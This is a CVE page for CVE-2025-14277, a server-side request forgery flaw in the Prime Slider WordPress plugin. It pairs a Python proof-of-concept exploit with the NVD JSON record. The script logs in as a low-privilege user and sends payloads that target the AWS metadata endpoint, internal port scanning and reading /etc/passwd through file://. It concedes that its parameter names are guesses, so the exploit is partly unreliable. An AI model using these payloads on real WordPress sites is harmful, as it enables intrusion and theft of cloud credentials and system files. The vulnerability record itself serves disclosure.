CVE-2025-14277

import requests import sys # CVE-2025-14277 PoC - Prime Slider SSRF # Target: WordPress site with vulnerable Prime Slider plugin (<=4.0.9) target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com' # Authentication setup # Register as subscriber or use existing low-privilege account session = requests.Session() # Login as subscriber-level user login_url = f'{target}/wp-login.php' login_data = { 'log': 'attacker_username', 'pwd': 'attacker_password', 'wp-submit': 'Log In' } session.post(login_url, data=login_data) # Exploit SSRF via import_elementor_template AJAX action ssrf_url = f'{target}/wp-admin/admin-ajax.php' # Example 1: Port scanning internal services payload = { 'action': 'import_elementor_template', 'server_addr': '192.168.1.1', 'server_port': '8080' } # Example 2: Access internal metadata (AWS) payload_metadata = { 'action': 'import_elementor_template', 'template_url': 'http://169.254.169.254/latest/meta-data/' } # Example 3: Read local files payload_file = { 'action': 'import_elementor_template', 'template_url': 'file:///etc/passwd' } response = session.post(ssrf_url, data=payload_metadata) print(f'Status: {response.status_code}') print(f'Response: {response.text[:500]}') # Note: Actual exploitation depends on plugin's specific parameter names # Check Wordfence advisory for exact request format

{"cve": {"id": "CVE-2025-14277", "sourceIdentifier": "[email protected]", "published": "2025-12-18T13:15:47.227", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Prime Slider – Addons for Elementor plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.9 via the import_elementor_template AJAX action. This makes it possible for authenticated attackers, with subscriber level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3419222/bdthemes-prime-slider-lite", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/069a56a1-ca17-43cc-a51f-51b6111f5b61?source=cve", "source": "[email protected]"}]}}